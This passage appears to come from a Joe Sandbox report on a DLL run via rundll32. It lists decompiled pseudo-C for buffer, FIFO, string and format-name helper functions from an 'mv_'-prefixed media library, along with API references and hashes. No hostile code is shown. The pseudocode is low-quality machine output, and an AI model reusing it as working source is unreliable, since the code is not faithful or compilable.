                                                      				 *_t42 =  *((intOrPtr*)( *_t41));
                                                      				_t23 = L10017F40();
                                                      				 *((intOrPtr*)(_t42 + 0x10)) = 1;
                                                      				_t33 = _t23;
                                                      				 *((intOrPtr*)(_t42 + 8)) = _t38;
                                                      				 *((intOrPtr*)(_t42 + 0xc)) =  *((intOrPtr*)(_t41 + 0x14));
                                                      				 *((intOrPtr*)(_t42 + 4)) =  *((intOrPtr*)(_t41 + 0x10));
                                                      				 *_t42 = _t42 + 0x2c;
                                                      				_t27 = E1003A070(_t33, _t36, _t38, _t39);
                                                      				if(_t27 >= 0) {
                                                      					_t28 =  *((intOrPtr*)(_t42 + 0x2c));
                                                      					_t34 = _t33 + _t39;
                                                      					if(_t34 >= _t28 ||  *((intOrPtr*)(_t41 + 4)) <= 0) {
                                                      						L7:
                                                      						 *((intOrPtr*)(_t41 + 0xc)) = _t38;
                                                      						return 0;
                                                      					}
                                                      					_t40 = 0;
                                                      					while(1) {
                                                      						 *((intOrPtr*)(_t42 + 4)) = _t28 - _t34;
                                                      						 *_t42 =  *((intOrPtr*)( *_t41 + _t40 * 4));
                                                      						_t27 = L10017F70(_t34, _t38, _t40, _t41);
                                                      						if(_t27 < 0) {
                                                      							goto L8;
                                                      						}
                                                      						_t40 = _t40 + 1;
                                                      						if( *((intOrPtr*)(_t41 + 4)) > _t40) {
                                                      							_t28 =  *((intOrPtr*)(_t42 + 0x2c));
                                                      							continue;
                                                      						} else {
                                                      							goto L7;
                                                      						}
                                                      						goto L8;
                                                      					}
                                                      				}
                                                      				L8:
                                                      				return _t27;
                                                      			}



















                                                      APIs
                                                      • mv_fifo_can_read.MAIN ref: 100027C7
                                                      • mv_fifo_can_write.MAIN ref: 100027D6
                                                      • mv_samples_get_buffer_size.MAIN ref: 100027FF
                                                      • mv_fifo_grow2.MAIN ref: 10002833
                                                        • Part of subcall function 10017F70: mv_realloc_array.MAIN(?,?,?,?,?,?,?,?,?,?,?,?,?,?,10002838), ref: 10017FAE
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_fifo_can_readmv_fifo_can_writemv_fifo_grow2mv_realloc_arraymv_samples_get_buffer_size
                                                      • String ID:
                                                      • API String ID: 78108474-0
                                                      • Opcode ID: 0ae8dcb50c524f4d83e5332cc30a05b3d9202b551eefed4852725224eaea7f23
                                                      • Instruction ID: aca124555f9e986d8ecf7dcc78e3baf80687684f5b36e82da0df567b59823915
                                                      • Opcode Fuzzy Hash: 0ae8dcb50c524f4d83e5332cc30a05b3d9202b551eefed4852725224eaea7f23
                                                      • Instruction Fuzzy Hash: 8611E378A093559FD700DF69C58094ABBE4FF88394F01892DFD88CB314E774E9458B92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Count64ObjectSingleTickWait
                                                      • String ID:
                                                      • API String ID: 3187275320-0
                                                      • Opcode ID: 1cfadcc898e6b36cfd1a4f7bf5837ebdbe6212e429eb6220fca006c3ac279431
                                                      • Instruction ID: 1bf18b280d2744a8743e55954746d7a5a9d8936b65fabab63a36412c31ae482f
                                                      • Opcode Fuzzy Hash: 1cfadcc898e6b36cfd1a4f7bf5837ebdbe6212e429eb6220fca006c3ac279431
                                                      • Instruction Fuzzy Hash: 1201BC32B092548BC700BEBD9CC845EBBE5FBC41A4F808A3DE988C7705E63098088792
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 43%
                                                      			E1001B7E0(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				char _v16;
                                                      				intOrPtr _v40;
                                                      				void* __ebx;
                                                      				void* __esi;
                                                      				char _t24;
                                                      				signed int _t28;
                                                      				intOrPtr _t31;
                                                      				intOrPtr* _t32;
                                                      				intOrPtr _t33;
                                                      				signed int _t40;
                                                      				intOrPtr _t42;
                                                      				void* _t43;
                                                      				intOrPtr* _t44;
                                                      
                                                      				_t44 = _t43 - 0x24;
                                                      				_t42 = _a4;
                                                      				 *_t44 = _a12;
                                                      				_t24 = L10009DC0(_t33, __ecx, __edi, _t42);
                                                      				_v16 = _t24;
                                                      				if(_t24 == 0) {
                                                      					L5:
                                                      					 *_t44 =  &_v16;
                                                      					E1000A000(_t33, _t42);
                                                      					return 0;
                                                      				} else {
                                                      					_t33 = _t24;
                                                      					_t28 =  *(_t42 + 0xe4);
                                                      					if(_t28 > 0x1ffffffe) {
                                                      						goto L5;
                                                      					} else {
                                                      						_v40 = 4 + _t28 * 4;
                                                      						 *_t44 =  *((intOrPtr*)(_t42 + 0xe0));
                                                      						_t31 = E10026280();
                                                      						if(_t31 == 0) {
                                                      							goto L5;
                                                      						} else {
                                                      							 *((intOrPtr*)(_t42 + 0xe0)) = _t31;
                                                      							 *_t44 = 0x14;
                                                      							_t32 = E100265E0();
                                                      							if(_t32 == 0) {
                                                      								goto L5;
                                                      							} else {
                                                      								 *((intOrPtr*)(_t32 + 0x10)) = _t33;
                                                      								 *((intOrPtr*)(_t32 + 4)) =  *((intOrPtr*)(_t33 + 4));
                                                      								 *((intOrPtr*)(_t32 + 8)) =  *((intOrPtr*)(_t33 + 8));
                                                      								 *_t32 = _a8;
                                                      								_t40 =  *(_t42 + 0xe4);
                                                      								 *(_t42 + 0xe4) = _t40 + 1;
                                                      								 *((intOrPtr*)( *((intOrPtr*)(_t42 + 0xe0)) + _t40 * 4)) = _t32;
                                                      								return _t32;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}

















                                                      APIs
                                                      • mv_buffer_alloc.MAIN(?,?,?,?,?,?,?,?,1001284A), ref: 1001B7F0
                                                        • Part of subcall function 10009DC0: mv_malloc.MAIN ref: 10009DDC
                                                        • Part of subcall function 10009DC0: mv_mallocz.MAIN ref: 10009DF2
                                                        • Part of subcall function 10009DC0: mv_mallocz.MAIN ref: 10009E25
                                                      • mv_realloc.MAIN(?,?,?,?,?,?,?,?,1001284A), ref: 1001B820
                                                        • Part of subcall function 10026280: _aligned_realloc.MSVCRT ref: 100262AB
                                                      • mv_mallocz.MAIN(?,?,?,?,?,?,?,?,1001284A), ref: 1001B836
                                                      • mv_buffer_unref.MAIN(?,?,?,?,?,?,?,?,1001284A), ref: 1001B87F
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_mallocz$_aligned_reallocmv_buffer_allocmv_buffer_unrefmv_mallocmv_realloc
                                                      • String ID:
                                                      • API String ID: 547404713-0
                                                      • Opcode ID: f53c243b31966ade95df7518ce4c0598c2817321e792378a526fbf3cdf0bd58c
                                                      • Instruction ID: e87e4f9eabebad2ec55774af977a150987189923fc92643a84a7bc33fe8d3c27
                                                      • Opcode Fuzzy Hash: f53c243b31966ade95df7518ce4c0598c2817321e792378a526fbf3cdf0bd58c
                                                      • Instruction Fuzzy Hash: 0011F8B4908B418FD750DF25D48068AFBE4FF48290F55896EE99A9B315EB30E881CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E10007050(intOrPtr __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v1028;
                                                      				intOrPtr _v1032;
                                                      				char _v1036;
                                                      				intOrPtr _v1052;
                                                      				intOrPtr _v1056;
                                                      				intOrPtr _v1060;
                                                      				intOrPtr _v1064;
                                                      				intOrPtr _t29;
                                                      				char* _t32;
                                                      				intOrPtr* _t39;
                                                      
                                                      				_t37 = __esi;
                                                      				_t36 = __edi;
                                                      				_v4 = __ebx;
                                                      				_t32 =  &_v1036;
                                                      				_v1060 = 0x7fffffff;
                                                      				_v1064 = 1;
                                                      				 *_t39 = _t32;
                                                      				E10008880(_t32, __edi, __esi, __ebp);
                                                      				 *_t39 = _t32;
                                                      				_v1052 = _a20;
                                                      				_v1056 = _a16;
                                                      				_v1060 = _a12;
                                                      				_v1064 = _a8;
                                                      				E10009730();
                                                      				if(_v1032 >= _v1028) {
                                                      					 *_t39 = _t32;
                                                      					_v1064 = 0;
                                                      					E10009690(_t32, 1, _t36, _t37);
                                                      					_t29 = 0xfffffff4;
                                                      				} else {
                                                      					 *_t39 = _t32;
                                                      					_v1064 = _a4;
                                                      					_t29 = E10009690(_t32, 1, _t36, _t37);
                                                      					if(_t29 >= 0) {
                                                      						_t29 = _v1032;
                                                      					}
                                                      				}
                                                      				return _t29;
                                                      			}















                                                      APIs
                                                      • mv_bprint_init.MAIN ref: 10007076
                                                      • mv_bprint_escape.MAIN ref: 100070AA
                                                        • Part of subcall function 10009730: mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB
                                                      • mv_bprint_finalize.MAIN ref: 100070C7
                                                        • Part of subcall function 10009690: mv_realloc.MAIN(?,?,?,?,?,?,10006D57), ref: 100096C9
                                                      • mv_bprint_finalize.MAIN ref: 100070F1
                                                      Similarity
                                                      • API ID: mv_bprint_finalize$mv_bprint_escapemv_bprint_initmv_bprintfmv_realloc
                                                      • String ID:
                                                      • API String ID: 2707718180-0
                                                      • Opcode ID: 8fcf3987ad7d05698dc9ea44ca5edbe39d28e2b760c260b832d1773102fd6b80
                                                      • Instruction ID: 7786e306f37471b19b8e033861bf3e046f7241f8be26b7eb16500715b45264db
                                                      • Opcode Fuzzy Hash: 8fcf3987ad7d05698dc9ea44ca5edbe39d28e2b760c260b832d1773102fd6b80
                                                      • Instruction Fuzzy Hash: 9F116DB4A093408BD360DF28C18065EBBE0BF88254F908E2DBA9C87345E635A944CB06
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E1001140B(void* __ebx, void* __esi, intOrPtr _a40, intOrPtr _a44, void* _a60, void* _a64, void* _a68, void* _a72, intOrPtr _a80) {
                                                      				intOrPtr* _t17;
                                                      
                                                      				E100265C0(__ebx);
                                                      				E100265C0(_a80);
                                                      				 *_t17 = _a40;
                                                      				L100265B0();
                                                      				 *_t17 = _a44;
                                                      				L100265B0();
                                                      				return __esi;
                                                      			}





                                                      APIs
                                                      Similarity
                                                      • API ID: mv_freep
                                                      • String ID:
                                                      • API String ID: 2373662943-0
                                                      • Opcode ID: 7d849d430b18bd63c2ffebc00fb6b84f710c2797a3bf5240d0040ef1fb02228c
                                                      • Instruction ID: e6160234d2b5473e354702e54758fc74ece171a8690405ef2f617578e500f202
                                                      • Opcode Fuzzy Hash: 7d849d430b18bd63c2ffebc00fb6b84f710c2797a3bf5240d0040ef1fb02228c
                                                      • Instruction Fuzzy Hash: B3E0AE79508B608BC700EF28D88141EB7F0FF89208F854C1DFAC4A7306E635F9448B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      • Assertion %s failed at %s:%d, xrefs: 1001F99A
                                                      Similarity
                                                      • API ID: mv_get_cpu_flags
                                                      • String ID: Assertion %s failed at %s:%d
                                                      • API String ID: 185405932-2766368343
                                                      • Opcode ID: 7551bec9f1eeb9b50cbb3d7bd5363e3c1abd8a109e782f2c9d38e8ffc4970d7f
                                                      • Instruction ID: 4f99d49389e0e95857478378ad07d1c4ddbe0ca0cbe19b611fff2a9fa084b9f8
                                                      • Opcode Fuzzy Hash: 7551bec9f1eeb9b50cbb3d7bd5363e3c1abd8a109e782f2c9d38e8ffc4970d7f
                                                      • Instruction Fuzzy Hash: 27410575A083419FC700DF58C18162EFBF1FF95740F91892DE9895B311D7B6EA858B42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • mv_image_get_linesize.MAIN ref: 1001F6E3
                                                        • Part of subcall function 1001E960: mv_pix_fmt_desc_get.MAIN(?,?,?,?,?,?,?,?,?,?,00000000,?,100B3560,00000000,1001F6E8), ref: 1001E976
                                                      Strings
                                                      • Picture size %ux%u is invalid, xrefs: 1001F76D
                                                      Similarity
                                                      • API ID: mv_image_get_linesizemv_pix_fmt_desc_get
                                                      • String ID: Picture size %ux%u is invalid
                                                      • API String ID: 645864070-1963597007
                                                      • Opcode ID: bffdba0522676a7119fbd8fb8b2c8a2483aa10af2a0b965411779b3daaf4d02a
                                                      • Instruction ID: 48c45da9e3d96b5e90a1d1455c756ac50fe1bc564d21c4e887ebdd33d9096bef
                                                      • Opcode Fuzzy Hash: bffdba0522676a7119fbd8fb8b2c8a2483aa10af2a0b965411779b3daaf4d02a
                                                      • Instruction Fuzzy Hash: 51213D75A083558FC304CF69C08021EFBE1FBC8710F658A2EF99897390EBB1E9458B46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: mv_parse_video_sizestrcmp
                                                      • String ID: none
                                                      • API String ID: 3218284479-2140143823
                                                      • Opcode ID: 84f624393dde609fecd91fcb81b813e84baa12488068a8de4cf90aaac65596b6
                                                      • Instruction ID: 729e6b95738b9364faedc3518f6085fbd91f0b578ed6da749226210f4fcd2ad2
                                                      • Opcode Fuzzy Hash: 84f624393dde609fecd91fcb81b813e84baa12488068a8de4cf90aaac65596b6
                                                      • Instruction Fuzzy Hash: C501AF756493819BC780DF28E58141ABBE0EF88780FD58C3EB999C7611E734ED50DB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: mv_bprint_init_for_buffermv_bprintf
                                                      • String ID: none
                                                      • API String ID: 2490314137-2140143823
                                                      • Opcode ID: 44bfa67158831aa083f8cc1da789653ca32cdf6bd98319aefa498c906f6f28ff
                                                      • Instruction ID: ef26fa46dfb025d24f9aeb391b3245028a50c27fa559dbd60d9f836e91f94d6c
                                                      • Opcode Fuzzy Hash: 44bfa67158831aa083f8cc1da789653ca32cdf6bd98319aefa498c906f6f28ff
                                                      • Instruction Fuzzy Hash: E60136B5904B568BD720DF24D880B9BB3E4FFC4394F52492DEA9853245D330BD858B97
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E1002B099(void* __ebx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a64, void* _a204, void* _a208, void* _a212, void* _a216) {
                                                      				void* _t9;
                                                      				void* _t10;
                                                      				intOrPtr _t11;
                                                      				intOrPtr* _t14;
                                                      				intOrPtr _t16;
                                                      				void* _t18;
                                                      				intOrPtr* _t20;
                                                      
                                                      				_t14 = __edi;
                                                      				__eax =  *__ebx;
                                                      				__eax = L10031930( *__ebx);
                                                      				__eax =  ==  ? 0x100b3bdc : __eax;
                                                      				_a12 = __eax;
                                                      				__esi =  &_a64;
                                                      				__eax = 0x100b3e26;
                                                      				_a8 = 0x100b3e26;
                                                      				__eax = 0x80;
                                                      				_a4 = 0x80;
                                                      				 *__esp = __esi;
                                                      				__eax = E10028560();
                                                      				if(_t9 > 0x7f) {
                                                      					_t10 = 0xffffffea;
                                                      				} else {
                                                      					 *_t20 = _t16;
                                                      					_t11 = E100267C0(__ebx, __edi, _t16, _t18);
                                                      					 *_t14 = _t11;
                                                      					if(_t11 == 0) {
                                                      						_t10 = 0xfffffff4;
                                                      					} else {
                                                      						_t10 = 0;
                                                      					}
                                                      				}
                                                      				return _t10;
                                                      			}










                                                      APIs
                                                      • mv_strdup.MAIN ref: 1002AE5C
                                                        • Part of subcall function 100267C0: strlen.MSVCRT ref: 100267DE
                                                        • Part of subcall function 100267C0: _aligned_realloc.MSVCRT ref: 10026805
                                                      • mv_get_pix_fmt_name.MAIN ref: 1002B0A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _aligned_realloc, mv_get_pix_fmt_name, mv_strdup, strlen
                                                      • String ID: none
                                                      • API String ID: 2695740210-2140143823
                                                      • Opcode ID: 1bdfb643ea00e6ad6df9396137144eb3072052bb604228f3ba1a7f9353facca7
                                                      • Instruction ID: 0d6bc99ecbd7f612be6a0bf6eac545e310f060afd60664256324de9b27112373
                                                      • Opcode Fuzzy Hash: 1bdfb643ea00e6ad6df9396137144eb3072052bb604228f3ba1a7f9353facca7
                                                      • Instruction Fuzzy Hash: 9EF0B6785087518FD760DB64945075EB7E0FF88300FA1882AED98A7301E634E9559B92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E1002B079(void* __ebx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a64, void* _a204, void* _a208, void* _a212, void* _a216) {
                                                      				void* _t9;
                                                      				void* _t10;
                                                      				intOrPtr _t11;
                                                      				intOrPtr* _t14;
                                                      				intOrPtr _t16;
                                                      				void* _t18;
                                                      				intOrPtr* _t20;
                                                      
                                                      				_t14 = __edi;
                                                      				__eax =  *__ebx;
                                                      				__eax = L10039D20( *__ebx);
                                                      				__eax =  ==  ? 0x100b3bdc : __eax;
                                                      				_a12 = __eax;
                                                      				__esi =  &_a64;
                                                      				__eax = 0x100b3e26;
                                                      				_a8 = 0x100b3e26;
                                                      				__eax = 0x80;
                                                      				_a4 = 0x80;
                                                      				 *__esp = __esi;
                                                      				__eax = E10028560();
                                                      				if(_t9 > 0x7f) {
                                                      					_t10 = 0xffffffea;
                                                      				} else {
                                                      					 *_t20 = _t16;
                                                      					_t11 = E100267C0(__ebx, __edi, _t16, _t18);
                                                      					 *_t14 = _t11;
                                                      					if(_t11 == 0) {
                                                      						_t10 = 0xfffffff4;
                                                      					} else {
                                                      						_t10 = 0;
                                                      					}
                                                      				}
                                                      				return _t10;
                                                      			}










                                                      APIs
                                                      • mv_strdup.MAIN ref: 1002AE5C
                                                        • Part of subcall function 100267C0: strlen.MSVCRT ref: 100267DE
                                                        • Part of subcall function 100267C0: _aligned_realloc.MSVCRT ref: 10026805
                                                      • mv_get_sample_fmt_name.MAIN ref: 1002B085
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _aligned_realloc, mv_get_sample_fmt_name, mv_strdup, strlen
                                                      • String ID: none
                                                      • API String ID: 2802023675-2140143823
                                                      • Opcode ID: 69058493cd3c9ad5c8ca340b2f5a7719628deb832772a771e9d99c4ade640db3
                                                      • Instruction ID: 5fee32d5547f3127f63c377983f0a0c76c391dad5c7b300539e2ac3540c0e873
                                                      • Opcode Fuzzy Hash: 69058493cd3c9ad5c8ca340b2f5a7719628deb832772a771e9d99c4ade640db3
                                                      • Instruction Fuzzy Hash: 0DF0B2785087518FD760DB24E84075EB7E0EB88200FA1882AE9C8A7301EA34E9558B92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 33%
                                                      			E10012408(char* __ebx, intOrPtr __esi, intOrPtr _a4, char* _a8, intOrPtr _a12, intOrPtr _a144, intOrPtr _a148) {
                                                      				char* _t14;
                                                      				intOrPtr _t18;
                                                      				intOrPtr _t21;
                                                      				intOrPtr* _t22;
                                                      
                                                      				_t19 = __esi;
                                                      				_t14 = __ebx;
                                                      				_a12 = __esi;
                                                      				_a4 = 0x20;
                                                      				 *_t22 = __ebx;
                                                      				_a8 = ".%06dZ";
                                                      				E100067F0(__ebx, _t18, __esi);
                                                      				_a8 = _t14;
                                                      				_a12 = 0;
                                                      				_a4 = _a148;
                                                      				 *_t22 = _a144;
                                                      				return E10011210(_t14, _t18, _t19, _t21);
                                                      			}







                                                      APIs
                                                      • mv_strlcatf.MAIN ref: 10012429
                                                        • Part of subcall function 100067F0: strlen.MSVCRT ref: 1000680A
                                                      • mv_dict_set.MAIN ref: 1001244D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_dict_set, mv_strlcatf, strlen
                                                      • String ID: .%06dZ
                                                      • API String ID: 1014950348-3752268379
                                                      • Opcode ID: 0fcd152bd701cbbf5cc4896f3278894f4415348b4f9091eae84d680c15830739
                                                      • Instruction ID: 22fa46e81f10ce603b991d120468da5a27ef3793c7905e7972ce2945146385a5
                                                      • Opcode Fuzzy Hash: 0fcd152bd701cbbf5cc4896f3278894f4415348b4f9091eae84d680c15830739
                                                      • Instruction Fuzzy Hash: 4BE04EB5908740AFD714DF29E48175ABBE0FB88354F51C82EA49CD7306D63898518B46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 23%
                                                      			E1001E474(void* __eax, void* __esi) {
                                                      
                                                      				__ebx =  *__eax;
                                                      				__ecx = __esi[0x24];
                                                      				__edx = __ebx[8];
                                                      				__eax =  *__edx;
                                                      				__eflags = __eax - 0xffffffff;
                                                      				if(__eax != 0xffffffff) {
                                                      					while(1) {
                                                      						__eflags = __eax - __ecx;
                                                      						if(__eflags == 0) {
                                                      							break;
                                                      						}
                                                      						__eax = 4[__edx];
                                                      						__edx =  &(4[__edx]);
                                                      						__eflags = __eax - 0xffffffff;
                                                      						if(__eax == 0xffffffff) {
                                                      							goto L33;
                                                      						}
                                                      					}
                                                      					__esp[3] = __esi;
                                                      					__eax = 0;
                                                      					__esp[2] = 0;
                                                      					__eax = __esi[0x30];
                                                      					__esp[1] = __esi[0x30];
                                                      					__eax = __esi[0x2c];
                                                      					 *__esp = __esi[0x2c];
                                                      					__eax = E1001F6A0(__ebx, __edx, __edi, __esi, __ebp, __eflags);
                                                      					__eflags = __eax;
                                                      					__ebx = __eax;
                                                      					if(__eax < 0) {
                                                      						goto L2;
                                                      					}
                                                      					__eax = __esi[4];
                                                      					__edx =  *__eax;
                                                      					__edx =  *( *__eax + 0x34);
                                                      					__eflags = __edx;
                                                      					if(__edx == 0) {
                                                      						L11:
                                                      						__eax = __eax[8];
                                                      						__eflags = __eax;
                                                      						if(__eax != 0) {
                                                      							__ebp = __esi[0x1c];
                                                      							__eflags = __esi[0x1c];
                                                      							if(__esi[0x1c] == 0) {
                                                      								__esi[0x1c] = __eax;
                                                      							}
                                                      						}
                                                      						__edi = __esi[0x20];
                                                      						__eflags = __esi[0x20];
                                                      						if(__esi[0x20] <= 0) {
                                                      							goto L1;
                                                      						} else {
                                                      							__eax = __esp[0x18];
                                                      							__ebx = 4;
                                                      							__edx = __esp[0x18][4];
                                                      							__esp[1] = 4;
                                                      							__esp[0xa] = __edx;
                                                      							__eax =  *(__edx + 0x20);
                                                      							 *__esp =  *(__edx + 0x20);
                                                      							__eax = E100266D0();
                                                      							__esp[0xf] = __eax;
                                                      							__eflags = __eax;
                                                      							if(__eax == 0) {
                                                      								__ebx = 0xfffffff4;
                                                      								L27:
                                                      								__eax = __esi[4];
                                                      								__eax =  *(__esi[4]);
                                                      								__eax = ( *(__esi[4]))[0x38];
                                                      								__eflags = __eax;
                                                      								if(__eax != 0) {
                                                      									 *__esp = __esi;
                                                      									__eax =  *__eax();
                                                      								}
                                                      								goto L2;
                                                      							}
                                                      							__edx = __esp[0xa];
                                                      							__ebx = 0;
                                                      							__ebp = 0;
                                                      							__ecx =  *(__edx + 0x20);
                                                      							__eflags =  *(__edx + 0x20);
                                                      							if( *(__edx + 0x20) <= 0) {
                                                      								L32:
                                                      								__eax =  &(__esp[0xf]);
                                                      								__ebx = 0;
                                                      								E100265C0( &(__esp[0xf]));
                                                      								goto L2;
                                                      							}
                                                      							__esp[0xb] = __esi;
                                                      							__edi = 0;
                                                      							__esi = __eax;
                                                      							__esp[0xa] = __edx;
                                                      							while(1) {
                                                      								__eax = L1001AC40(__ebx, __edi, __esi);
                                                      								__ebx = __ebp * 4;
                                                      								 *__esi = __eax;
                                                      								__eax = __esp[0xf];
                                                      								__eax = __ebx[__esp[0xf]];
                                                      								__eflags = __eax;
                                                      								if(__eax == 0) {
                                                      									break;
                                                      								}
                                                      								__esp[1] = __eax;
                                                      								__eax = __esp[0x18];
                                                      								__edx = 0;
                                                      								__esp[2] = 0;
                                                      								 *__esp = __esp[0x18];
                                                      								__eax = E1001E2F0();
                                                      								__eflags = __eax;
                                                      								__edi = __eax;
                                                      								if(__eax < 0) {
                                                      									__edx = __esp[0xa];
                                                      									__ebx = __eax;
                                                      									__esi = __esp[0xb];
                                                      									__eax =  *(__edx + 0x20);
                                                      									__eflags =  *(__edx + 0x20);
                                                      									if( *(__edx + 0x20) > 0) {
                                                      										L24:
                                                      										__edi = 0;
                                                      										__eflags = 0;
                                                      										__ebp = __edx;
                                                      										do {
                                                      											__esp[0xf] = __esp[0xf] + __edi * 4;
                                                      											__edi =  &(__edi[1]);
                                                      											__eax = L1001ADB0(__ebx, __eax);
                                                      											__eflags = __edi -  *((intOrPtr*)(__ebp + 0x20));
                                                      										} while (__edi <  *((intOrPtr*)(__ebp + 0x20)));
                                                      										__eax =  &(__esp[0xf]);
                                                      										E100265C0( &(__esp[0xf]));
                                                      										__eflags = __ebx;
                                                      										if(__ebx >= 0) {
                                                      											goto L1;
                                                      										}
                                                      										goto L27;
                                                      									}
                                                      									__eax =  &(__esp[0xf]);
                                                      									E100265C0( &(__esp[0xf]));
                                                      									goto L27;
                                                      								}
                                                      								__eax = __esp[0xa];
                                                      								__ebp = __ebp + 1;
                                                      								__eax = __esp[0xa][0x20];
                                                      								__eflags = __ebp - __eax;
                                                      								if(__ebp >= __eax) {
                                                      									__esi = __esp[0xb];
                                                      									__ebx = __edi;
                                                      									__edx = __esp[0xa];
                                                      									L23:
                                                      									__eflags = __eax;
                                                      									if(__eax <= 0) {
                                                      										goto L32;
                                                      									}
                                                      									goto L24;
                                                      								}
                                                      								__esi = __esp[0xf];
                                                      							}
                                                      							__edx = __esp[0xa];
                                                      							__ebx = __edi;
                                                      							__esi = __esp[0xb];
                                                      							__eax =  *(__edx + 0x20);
                                                      							goto L23;
                                                      						}
                                                      					}
                                                      					 *__esp = __esi;
                                                      					__eax =  *__edx();
                                                      					__eflags = __eax;
                                                      					__ebx = __eax;
                                                      					if(__eax < 0) {
                                                      						goto L27;
                                                      					}
                                                      					__eax = __esi[4];
                                                      					goto L11;
